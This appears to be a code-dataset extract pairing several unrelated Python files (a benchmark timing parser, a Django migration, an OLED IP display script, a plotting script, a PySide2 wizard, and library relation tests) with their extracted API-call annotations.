code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
---|---|---|
#!/usr/bin/python2
# Copyright (c) 2011 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This script produces csv data from multiple benchmarking runs with the
# spec2k harness.
#
# A typical usage would be
#
# export SPEC_RUN_REPETITIONS=3
# ./run_all.sh RunTimedBenchmarks SetupPnaclX8664Opt ref > ../timings.setting1
# [change the compiler settings]
# ./run_all.sh RunTimedBenchmarks SetupPnaclX8664Opt ref > ../timings.setting2
#
# tests/spec2k/extract_timings.py time.inline time.noinline time.lowinline
#
# which produces output like:
# name , inline , noinline , lowinline
# ammp , 250.47 , 263.83 , 262.20
# art , 222.12 , 219.36 , 259.28
# bzip2 , 179.05 , 194.05 , missing
# crafty , 60.24 , 73.33 , missing
# ...
#
# Alternatively, if your data already has the form:
#
# <bechmark> <setting> <value>
#
# You can run the tool like so:
# tests/spec2k/extract_timings.py < <data-file>
import sys
# The name the individual settings derived from the filename in the order
# they were given on the command-line
SETTINGS = []
# dictionary of dictionaries accessed like so:
# BENCHMARKS['benchmark']['setting']
BENCHMARKS = {}
def AddDataPoint(benchmark, setting, v):
if setting not in SETTINGS:
# TODO: linear search is slightly inefficient
SETTINGS.append(setting)
values = BENCHMARKS.get(benchmark, {})
values[setting] = v
BENCHMARKS[benchmark] = values
def ExtractResults(name, inp):
for line in inp:
if not line.startswith('RESULT'):
continue
tokens = line.split()
# NOTE: the line we care about look like this:
# 'RESULT runtime_equake: pnacl.opt.x8664= [107.36,116.28,116.4] secs'
assert tokens[0] == 'RESULT'
assert tokens[1].endswith(':')
assert tokens[2].endswith('=')
assert tokens[3].startswith('[')
assert tokens[3].endswith(']')
benchmark = tokens[1][:-1].split('_')[-1]
data = tokens[3][1:][:-1].split(',')
data = [float(d) for d in data]
m = min(data)
AddDataPoint(benchmark, name, m)
# Note: we are intentionally not using the csv module
# as it does not provide nicely formatted output
def DumpRow(row):
sys.stdout.write('%-20s' % row[0])
for val in row[1:]:
if type(val) == str:
sys.stdout.write(', %10s' % val)
else:
sys.stdout.write(', %10.2f' % val)
sys.stdout.write('\n')
def DumpCsv():
row = ['name'] + SETTINGS
DumpRow(row)
for k in sorted(BENCHMARKS.keys()):
row = [k]
values = BENCHMARKS[k]
for s in SETTINGS:
if s in values:
row.append(values[s])
else:
row.append('missing')
DumpRow(row)
if len(sys.argv) > 1:
for f in sys.argv[1:]:
setting = f.split('.')[-1]
fin = open(f)
ExtractResults(setting, fin)
fin.close()
else:
for line in sys.stdin:
tokens = line.split()
if not tokens: continue
assert len(tokens) == 3
AddDataPoint(tokens[0], tokens[1], float(tokens[2]))
DumpCsv()
|
[
"sys.stdout.write"
] |
[((2320, 2354), 'sys.stdout.write', 'sys.stdout.write', (["('%-20s' % row[0])"], {}), "('%-20s' % row[0])\n", (2336, 2354), False, 'import sys\n'), ((2494, 2516), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (2510, 2516), False, 'import sys\n'), ((2408, 2440), 'sys.stdout.write', 'sys.stdout.write', (["(', %10s' % val)"], {}), "(', %10s' % val)\n", (2424, 2440), False, 'import sys\n'), ((2457, 2491), 'sys.stdout.write', 'sys.stdout.write', (["(', %10.2f' % val)"], {}), "(', %10.2f' % val)\n", (2473, 2491), False, 'import sys\n')]
|
# Generated by Django 3.1.3 on 2020-11-23 10:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('fit', '0004_auto_20201123_1625'),
]
operations = [
migrations.AlterField(
model_name='disease',
name='med1',
field=models.CharField(blank=True, default='', max_length=60),
),
migrations.AlterField(
model_name='disease',
name='med2',
field=models.CharField(blank=True, default='', max_length=60),
),
migrations.AlterField(
model_name='disease',
name='med3',
field=models.CharField(blank=True, default='', max_length=60),
),
migrations.AlterField(
model_name='disease',
name='med4',
field=models.CharField(blank=True, default='', max_length=60),
),
migrations.AlterField(
model_name='disease',
name='med5',
field=models.CharField(blank=True, default='', max_length=60),
),
migrations.AlterField(
model_name='disease',
name='med6',
field=models.CharField(blank=True, default='', max_length=60),
),
]
|
[
"django.db.models.CharField"
] |
[((331, 386), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(60)'}), "(blank=True, default='', max_length=60)\n", (347, 386), False, 'from django.db import migrations, models\n'), ((507, 562), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(60)'}), "(blank=True, default='', max_length=60)\n", (523, 562), False, 'from django.db import migrations, models\n'), ((683, 738), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(60)'}), "(blank=True, default='', max_length=60)\n", (699, 738), False, 'from django.db import migrations, models\n'), ((859, 914), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(60)'}), "(blank=True, default='', max_length=60)\n", (875, 914), False, 'from django.db import migrations, models\n'), ((1035, 1090), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(60)'}), "(blank=True, default='', max_length=60)\n", (1051, 1090), False, 'from django.db import migrations, models\n'), ((1211, 1266), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(60)'}), "(blank=True, default='', max_length=60)\n", (1227, 1266), False, 'from django.db import migrations, models\n')]
|
# For use with I2C OLED screens.
# This requires the Adafruit Circuit Python OLED library, which superceeds earlier Adafruit OLED libraries
# Install it with `pip install adafruit-circuitpython-ssd1306`
import time
from subprocess import check_output
from board import SCL, SDA
import busio
from PIL import Image, ImageDraw, ImageFont
import adafruit_ssd1306
def get_ip():
cmd = "hostname -I | cut -d\' \' -f1"
return check_output(cmd, shell=True).decode("utf-8").strip()
# Create the I2C interface.
i2c = busio.I2C(SCL, SDA)
# Create the SSD1306 OLED class.
# The first two parameters are the pixel width and pixel height. Change these
# to the right size for your display!
disp = adafruit_ssd1306.SSD1306_I2C(128, 32, i2c)
# Clear display.
disp.fill(0)
disp.show()
# Create blank image for drawing.
# Make sure to create image with mode '1' for 1-bit color.
width = disp.width
height = disp.height
image = Image.new("1", (width, height))
# Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
# Draw a black filled box to clear the image.
draw.rectangle((0, 0, width, height), outline=0, fill=0)
# Draw some shapes.
# First define some constants to allow easy resizing of shapes.
padding = -2
top = padding
bottom = height - padding
# Move left to right keeping track of the current x position for drawing shapes.
x = 0
# Load default font.
font = ImageFont.load_default()
no_IP = True
draw.text((x, top + 0), "Starting search for WiFi", font=font, fill=255)
disp.image(image)
disp.show()
time.sleep(1)
while no_IP:
# Clear display.
draw.rectangle((0, 0, width, height), outline=0, fill=0)
disp.fill(0)
disp.show()
ip_addr = get_ip()
if ip_addr:
draw.text((x, top + 0), "IP: " + ip_addr, font=font, fill=255)
no_IP = False
else:
draw.text((x, top + 0), "Searching for WiFi", font=font, fill=255)
disp.image(image)
disp.show()
time.sleep(1)
|
[
"PIL.Image.new",
"busio.I2C",
"PIL.ImageFont.load_default",
"subprocess.check_output",
"time.sleep",
"PIL.ImageDraw.Draw",
"adafruit_ssd1306.SSD1306_I2C"
] |
[((514, 533), 'busio.I2C', 'busio.I2C', (['SCL', 'SDA'], {}), '(SCL, SDA)\n', (523, 533), False, 'import busio\n'), ((692, 734), 'adafruit_ssd1306.SSD1306_I2C', 'adafruit_ssd1306.SSD1306_I2C', (['(128)', '(32)', 'i2c'], {}), '(128, 32, i2c)\n', (720, 734), False, 'import adafruit_ssd1306\n'), ((920, 951), 'PIL.Image.new', 'Image.new', (['"""1"""', '(width, height)'], {}), "('1', (width, height))\n", (929, 951), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((999, 1020), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', (['image'], {}), '(image)\n', (1013, 1020), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((1379, 1403), 'PIL.ImageFont.load_default', 'ImageFont.load_default', ([], {}), '()\n', (1401, 1403), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((1522, 1535), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (1532, 1535), False, 'import time\n'), ((1878, 1891), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (1888, 1891), False, 'import time\n'), ((424, 453), 'subprocess.check_output', 'check_output', (['cmd'], {'shell': '(True)'}), '(cmd, shell=True)\n', (436, 453), False, 'from subprocess import check_output\n')]
|
import numpy as np
import matplotlib.pyplot as plt
#plt.rc('font', family='serif')
#plt.rc('text', usetex=True)
sol1err = np.fromfile('../out/sol1err')
sol2err = np.fromfile('../out/sol2err')
L2err = np.sqrt(sol2err**2 + sol1err**2)
h = np.fromfile('../out/h')
x = np.sort(h)
fig, ax = plt.subplots(1,1)
for i in range(1,10):
hh = np.logspace(np.log10(min(h)), np.log10(max(h)), 2500)
b = np.log10(L2err[0]/(10**(i*np.log10(h[0]))))
y = 10**(i*np.log10(hh) + b)
mask = (y > min(L2err))
hh = hh[mask]
y = y[mask]
ax.loglog(hh, y, ':', label='$\propto (\Delta t)^{%d}$' % i)
ax.text(min(hh), min(y), str(i), ha='right', va='bottom')
ax.loglog(h, L2err, 'k.', label='results')
ax.set_xlabel('step size $(\Delta t)$')
ax.set_ylabel('$l_2$ error')
ax.legend()
ax.set_title('Convergence Test')
plt.tight_layout()
plt.show()
|
[
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.show",
"numpy.fromfile",
"numpy.sort",
"numpy.log10",
"matplotlib.pyplot.subplots",
"numpy.sqrt"
] |
[((124, 153), 'numpy.fromfile', 'np.fromfile', (['"""../out/sol1err"""'], {}), "('../out/sol1err')\n", (135, 153), True, 'import numpy as np\n'), ((164, 193), 'numpy.fromfile', 'np.fromfile', (['"""../out/sol2err"""'], {}), "('../out/sol2err')\n", (175, 193), True, 'import numpy as np\n'), ((202, 238), 'numpy.sqrt', 'np.sqrt', (['(sol2err ** 2 + sol1err ** 2)'], {}), '(sol2err ** 2 + sol1err ** 2)\n', (209, 238), True, 'import numpy as np\n'), ((239, 262), 'numpy.fromfile', 'np.fromfile', (['"""../out/h"""'], {}), "('../out/h')\n", (250, 262), True, 'import numpy as np\n'), ((267, 277), 'numpy.sort', 'np.sort', (['h'], {}), '(h)\n', (274, 277), True, 'import numpy as np\n'), ((289, 307), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (301, 307), True, 'import matplotlib.pyplot as plt\n'), ((826, 844), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (842, 844), True, 'import matplotlib.pyplot as plt\n'), ((845, 855), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (853, 855), True, 'import matplotlib.pyplot as plt\n'), ((460, 472), 'numpy.log10', 'np.log10', (['hh'], {}), '(hh)\n', (468, 472), True, 'import numpy as np\n'), ((427, 441), 'numpy.log10', 'np.log10', (['h[0]'], {}), '(h[0])\n', (435, 441), True, 'import numpy as np\n')]
|
from PySide2 import QtWidgets, QtCore
import os
from ..utils import load_ui_file
from ..widgets.filter import FilterListerWidget, parse_filter_widget
from ..widgets.geo import LocationSelectorWidget
from ...utils import findMainWindow
from futura.utils import create_filter_from_description
from futura import w
from futura.proxy import WurstProcess
class RegionalisationWizard(QtWidgets.QWizard):
def __init__(self, parent=None):
super(RegionalisationWizard, self).__init__(parent)
ui_path = 'regionalisation_wizard.ui'
ui_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), ui_path)
load_ui_file(ui_path, self)
self.filter_widget = FilterListerWidget()
self.filterLayout.addWidget(self.filter_widget)
self.location_widget = LocationSelectorWidget()
self.locationLayout.addWidget(self.location_widget)
self.currentIdChanged.connect(self.page_change)
def page_change(self, page_id):
if page_id == 1:
self.restrict_locations()
elif page_id == 2:
self.confirm_setup()
def confirm_setup(self):
print("This is the last page")
this_filter = create_filter_from_description(parse_filter_widget(self.filter_widget))
db = findMainWindow().loader.database.db
this_item_set = [WurstProcess(x) for x in w.get_many(db, *this_filter)]
#this_item = w.get_one(db, *this_filter)
print(this_item_set)
item_string = ""
for n, this_item in enumerate(this_item_set):
item_string += "{} ({}) [{}]".format(this_item['name'], this_item['unit'], this_item['location'])
if n != len(this_item_set):
item_string += "\n"
self.processLabel.setText(item_string)
if len(this_item_set) > 1:
self.processDescriptionLabel.setText('Base processes: ')
else:
self.processDescriptionLabel.setText('Base process: ')
location_list = ", ".join([x['display'] for x in self.location_widget.checked_items])
self.locationLabel.setText(location_list)
def restrict_locations(self):
base_filter = parse_filter_widget(self.filter_widget)
no_location_filter = [x for x in base_filter if x['args'][0] != 'location']
this_filter = create_filter_from_description(base_filter)
no_location = create_filter_from_description(no_location_filter)
db = findMainWindow().loader.database.db
this_item = w.get_one(db, *this_filter)
item_location = this_item['location']
other_items = w.get_many(db, *no_location)
other_locations = [x['location'] for x in other_items]
other_locations = [x for x in other_locations if x != 'RoW']
locations = list(set(other_locations + [item_location]))
print(locations)
self.location_widget.find_and_disable(locations)
|
[
"futura.utils.create_filter_from_description",
"os.path.abspath",
"futura.proxy.WurstProcess",
"futura.w.get_one",
"futura.w.get_many"
] |
[((2328, 2371), 'futura.utils.create_filter_from_description', 'create_filter_from_description', (['base_filter'], {}), '(base_filter)\n', (2358, 2371), False, 'from futura.utils import create_filter_from_description\n'), ((2394, 2444), 'futura.utils.create_filter_from_description', 'create_filter_from_description', (['no_location_filter'], {}), '(no_location_filter)\n', (2424, 2444), False, 'from futura.utils import create_filter_from_description\n'), ((2514, 2541), 'futura.w.get_one', 'w.get_one', (['db', '*this_filter'], {}), '(db, *this_filter)\n', (2523, 2541), False, 'from futura import w\n'), ((2610, 2638), 'futura.w.get_many', 'w.get_many', (['db', '*no_location'], {}), '(db, *no_location)\n', (2620, 2638), False, 'from futura import w\n'), ((1346, 1361), 'futura.proxy.WurstProcess', 'WurstProcess', (['x'], {}), '(x)\n', (1358, 1361), False, 'from futura.proxy import WurstProcess\n'), ((591, 616), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (606, 616), False, 'import os\n'), ((1371, 1399), 'futura.w.get_many', 'w.get_many', (['db', '*this_filter'], {}), '(db, *this_filter)\n', (1381, 1399), False, 'from futura import w\n')]
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Test records relations siblings."""
import json
from flask import url_for
from invenio_app_ils.documents.api import Document
from tests.helpers import get_test_record, user_login
from .helpers import (recrel_assert_record_relations,
recrel_choose_endpoints_and_do_request)
def _test_sibl_language_relation(client, json_headers):
"""Test creation/deletion siblings language relations."""
first_pid_value = "docid-1"
first_pid_type = "docid"
second_pid_value = "docid-2"
second_pid_type = "docid"
third_pid_value = "docid-6"
third_pid_type = "docid"
relation_type = "language"
payload = [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": relation_type,
},
{
"pid_value": third_pid_value,
"pid_type": third_pid_type,
"relation_type": relation_type,
},
]
def _test_create():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "POST"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
rec3 = Document.get_record_by_pid(third_pid_value)
rec3 = rec3.replace_refs()
recrel_assert_record_relations(
rec1,
expected={
"relations": {
"language": [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec2["title"],
"languages": rec2["languages"],
"document_type": rec2["document_type"],
"publication_year": rec2["publication_year"],
},
},
{
"pid_value": third_pid_value,
"pid_type": third_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec3["title"],
"document_type": rec3["document_type"],
"languages": rec3["languages"],
"publication_year": rec3["publication_year"],
},
},
]
}
},
)
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"language": [
{
"pid_value": first_pid_value,
"pid_type": first_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec1["title"],
"languages": rec1["languages"],
"edition": rec1["edition"],
"document_type": rec1["document_type"],
"publication_year": rec1["publication_year"],
},
},
{
"pid_value": third_pid_value,
"pid_type": third_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec3["title"],
"languages": rec3["languages"],
"document_type": rec3["document_type"],
"publication_year": rec3["publication_year"],
},
},
]
}
},
)
recrel_assert_record_relations(
rec3,
expected={
"relations": {
"language": [
{
"pid_value": first_pid_value,
"pid_type": first_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec1["title"],
"languages": rec1["languages"],
"edition": rec1["edition"],
"document_type": rec1["document_type"],
"publication_year": rec1["publication_year"],
},
},
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec2["title"],
"languages": rec2["languages"],
"document_type": rec2["document_type"],
"publication_year": rec2["publication_year"],
},
},
]
}
},
)
def _test_delete():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "DELETE"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
rec3 = Document.get_record_by_pid(third_pid_value)
rec3 = rec3.replace_refs()
recrel_assert_record_relations(rec1, expected={"relations": {}})
recrel_assert_record_relations(rec2, expected={"relations": {}})
recrel_assert_record_relations(rec3, expected={"relations": {}})
_test_create()
_test_delete()
# recreate for the next one, to have some more valuable test data
_test_create()
def _test_sibl_edition_relation(client, json_headers, testdata):
"""Test creation/deletion siblings edition relations."""
first_pid_value = "docid-3"
first_pid_type = "docid"
second_pid_value = "docid-1"
second_pid_type = "docid"
relation_type = "edition"
payload = {
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": relation_type,
}
def _test_create():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "POST"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
recrel_assert_record_relations(
rec1,
expected={
"relations": {
"edition": [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": "edition",
"record_metadata": {
"title": rec2["title"],
"edition": rec2["edition"],
"languages": rec2["languages"],
"document_type": rec2["document_type"],
"publication_year": rec2["publication_year"],
},
}
]
}
},
)
rec_docid_2 = get_test_record(testdata, "documents", "docid-2")
rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"edition": [
{
"pid_value": first_pid_value,
"pid_type": first_pid_type,
"relation_type": "edition",
"record_metadata": {
"title": rec1["title"],
"edition": rec1["edition"],
"document_type": rec1["document_type"],
"publication_year": rec1["publication_year"],
},
}
],
"language": [
{
"pid_value": rec_docid_2["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_2["title"],
"languages": rec_docid_2["languages"],
"document_type": rec_docid_2["document_type"],
"publication_year": rec_docid_2[
"publication_year"
],
},
},
{
"pid_value": rec_docid_6["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_6["title"],
"document_type": rec_docid_6["document_type"],
"languages": rec_docid_6['languages'],
"publication_year": rec_docid_6[
"publication_year"
],
},
},
],
}
},
)
def _test_delete():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "DELETE"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
recrel_assert_record_relations(rec1, expected={"relations": {}})
rec_docid_2 = get_test_record(testdata, "documents", "docid-2")
rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"language": [
{
"pid_value": rec_docid_2["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_2["title"],
"languages": rec_docid_2["languages"],
"document_type": rec_docid_2["document_type"],
"publication_year": rec_docid_2[
"publication_year"
],
},
},
{
"pid_value": rec_docid_6["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_6["title"],
"document_type": rec_docid_6["document_type"],
"languages": rec_docid_6["languages"],
"publication_year": rec_docid_6[
"publication_year"
],
},
},
]
}
},
)
def _test_empty_edition_field():
edition_first_pid_value = "docid-11"
edition_first_pid_type = "docid"
edition_second_pid_value = "docid-12"
edition_second_pid_type = "docid"
create_payload = {
"pid_value": edition_second_pid_value,
"pid_type": edition_second_pid_type,
"relation_type": relation_type,
}
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "POST"),
(
edition_first_pid_value,
edition_first_pid_type,
edition_second_pid_value,
edition_second_pid_type,
),
create_payload,
expect_status_code=400
)
_test_create()
_test_delete()
# recreate for the next one, to have some more valuable test data
_test_create()
_test_empty_edition_field()
def _test_sibl_other_relation(client, json_headers, testdata):
"""Test creation/deletion siblings other relations."""
first_pid_value = "docid-2"
first_pid_type = "docid"
second_pid_value = "docid-3"
second_pid_type = "docid"
relation_type = "other"
payload = {
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": relation_type,
"note": "exercise",
}
def _test_create():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "POST"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
rec_docid_1 = get_test_record(testdata, "documents", "docid-1")
rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
recrel_assert_record_relations(
rec1,
expected={
"relations_extra_metadata": {
"other": [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"note": "exercise",
}
]
},
"relations": {
"language": [
{
"pid_value": rec_docid_1["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_1["title"],
"edition": rec_docid_1["edition"],
"languages": rec_docid_1["languages"],
"document_type": rec_docid_1["document_type"],
"publication_year": rec_docid_1[
"publication_year"
],
},
},
{
"pid_value": rec_docid_6["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_6["title"],
"document_type": rec_docid_6["document_type"],
"languages": rec_docid_6["languages"],
"publication_year": rec_docid_6[
"publication_year"
],
},
},
],
"other": [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"note": "exercise",
"relation_type": "other",
"record_metadata": {
"title": rec2["title"],
"edition": rec2["edition"],
"document_type": rec2["document_type"],
"publication_year": rec2["publication_year"],
},
}
],
},
},
)
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"edition": [
{
"pid_value": rec_docid_1["pid"],
"pid_type": "docid",
"relation_type": "edition",
"record_metadata": {
"title": rec_docid_1["title"],
"edition": rec_docid_1["edition"],
"languages": rec_docid_1["languages"],
"document_type": rec_docid_1["document_type"],
"publication_year": rec_docid_1[
"publication_year"
],
},
}
],
"other": [
{
"pid_value": first_pid_value,
"pid_type": first_pid_type,
"note": "exercise",
"relation_type": "other",
"record_metadata": {
"title": rec1["title"],
"languages": rec1["languages"],
"document_type": rec1["document_type"],
"publication_year": rec1["publication_year"],
},
}
],
}
},
)
def _test_delete():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "DELETE"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
rec_docid_1 = get_test_record(testdata, "documents", "docid-1")
rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
recrel_assert_record_relations(
rec1,
expected={
"relations": {
"language": [
{
"pid_value": rec_docid_1["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_1["title"],
"edition": rec_docid_1["edition"],
"languages": rec_docid_1["languages"],
"document_type": rec_docid_1["document_type"],
"publication_year": rec_docid_1[
"publication_year"
],
},
},
{
"pid_value": rec_docid_6["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_6["title"],
"document_type": rec_docid_6["document_type"],
"languages": rec_docid_6["languages"],
"publication_year": rec_docid_6[
"publication_year"
],
},
},
]
}
},
)
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"edition": [
{
"pid_value": rec_docid_1["pid"],
"pid_type": "docid",
"relation_type": "edition",
"record_metadata": {
"title": rec_docid_1["title"],
"edition": rec_docid_1["edition"],
"languages": rec_docid_1["languages"],
"document_type": rec_docid_1["document_type"],
"publication_year": rec_docid_1[
"publication_year"
],
},
}
]
}
},
)
_test_create()
_test_delete()
# recreate for the next one, to have some more valuable test data
_test_create()
def _test_sibl_invalid_relations_should_fail(
client, json_headers, invalids, status_code=400
):
"""Test relation creation with invalid siblings should fail."""
api_endpoint_documents = "invenio_app_ils_relations.docid_relations"
api_endpoint_series = "invenio_app_ils_relations.serid_relations"
for invalid in invalids:
first_pid_value = invalid["first_pid_value"]
first_pid_type = invalid["first_pid_type"]
second_pid_value = invalid["second_pid_value"]
second_pid_type = invalid["second_pid_type"]
relation_type = invalid["relation_type"]
api_endpoint = (
api_endpoint_documents
if first_pid_type == "docid"
else api_endpoint_series
)
url = url_for(api_endpoint, pid_value=first_pid_value)
payload = {
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": relation_type,
}
res = client.post(url, headers=json_headers, data=json.dumps(payload))
assert res.status_code == status_code
if status_code == 400:
error = json.loads(res.data.decode("utf-8"))
assert "message" in error
assert first_pid_value in error["message"]
assert second_pid_value in error["message"]
def test_siblings_relations(client, json_headers, testdata, users):
"""Test siblings relations."""
# only one test method to speed up tests and avoid testdata recreation at
# each test. As drawback, testdata is not cleaned between each test, so
# do not change the order of execution of the following tests :)
_test_sibl_invalid_relations_should_fail(
client,
json_headers,
[
{
"first_pid_value": "docid-1",
"first_pid_type": "docid",
"second_pid_value": "docid-2",
"second_pid_type": "docid",
"relation_type": "language",
}
],
status_code=401,
)
user_login(client, "librarian", users)
# docid-1 --language--> docid-2 and docid-6
_test_sibl_language_relation(client, json_headers)
# docid-3 --edition--> docid-1
_test_sibl_edition_relation(client, json_headers, testdata)
# docid-2 --other--> docid-3
_test_sibl_other_relation(client, json_headers, testdata)
# test wrong relations
invalids = [
# different pid type
{
"first_pid_value": "docid-1",
"first_pid_type": "docid",
"second_pid_value": "serid-1",
"second_pid_type": "serid",
"relation_type": "language",
},
# invalid edition: document with serial
{
"first_pid_value": "serid-3",
"first_pid_type": "serid",
"second_pid_value": "docid-5",
"second_pid_type": "docid",
"relation_type": "edition",
},
# different pid type
{
"first_pid_value": "serid-1",
"first_pid_type": "serid",
"second_pid_value": "docid-1",
"second_pid_type": "docid",
"relation_type": "other",
},
# same record
{
"first_pid_value": "docid-6",
"first_pid_type": "docid",
"second_pid_value": "docid-6",
"second_pid_type": "docid",
"relation_type": "language",
},
]
_test_sibl_invalid_relations_should_fail(client, json_headers, invalids)
|
[
"invenio_app_ils.documents.api.Document.get_record_by_pid",
"tests.helpers.get_test_record",
"tests.helpers.user_login",
"json.dumps",
"flask.url_for"
] |
[((24059, 24097), 'tests.helpers.user_login', 'user_login', (['client', '"""librarian"""', 'users'], {}), "(client, 'librarian', users)\n", (24069, 24097), False, 'from tests.helpers import get_test_record, user_login\n'), ((1538, 1581), 'invenio_app_ils.documents.api.Document.get_record_by_pid', 'Document.get_record_by_pid', (['third_pid_value'], {}), '(third_pid_value)\n', (1564, 1581), False, 'from invenio_app_ils.documents.api import Document\n'), ((6195, 6238), 'invenio_app_ils.documents.api.Document.get_record_by_pid', 'Document.get_record_by_pid', (['third_pid_value'], {}), '(third_pid_value)\n', (6221, 6238), False, 'from invenio_app_ils.documents.api import Document\n'), ((8269, 8318), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-2"""'], {}), "(testdata, 'documents', 'docid-2')\n", (8284, 8318), False, 'from tests.helpers import get_test_record, user_login\n'), ((8341, 8390), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-6"""'], {}), "(testdata, 'documents', 'docid-6')\n", (8356, 8390), False, 'from tests.helpers import get_test_record, user_login\n'), ((11022, 11071), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-2"""'], {}), "(testdata, 'documents', 'docid-2')\n", (11037, 11071), False, 'from tests.helpers import get_test_record, user_login\n'), ((11094, 11143), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-6"""'], {}), "(testdata, 'documents', 'docid-6')\n", (11109, 11143), False, 'from tests.helpers import get_test_record, user_login\n'), ((14444, 14493), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-1"""'], {}), "(testdata, 'documents', 'docid-1')\n", (14459, 14493), False, 'from tests.helpers import get_test_record, user_login\n'), ((14516, 14565), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-6"""'], {}), "(testdata, 'documents', 'docid-6')\n", (14531, 14565), False, 'from tests.helpers import get_test_record, user_login\n'), ((19188, 19237), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-1"""'], {}), "(testdata, 'documents', 'docid-1')\n", (19203, 19237), False, 'from tests.helpers import get_test_record, user_login\n'), ((19260, 19309), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-6"""'], {}), "(testdata, 'documents', 'docid-6')\n", (19275, 19309), False, 'from tests.helpers import get_test_record, user_login\n'), ((22765, 22813), 'flask.url_for', 'url_for', (['api_endpoint'], {'pid_value': 'first_pid_value'}), '(api_endpoint, pid_value=first_pid_value)\n', (22772, 22813), False, 'from flask import 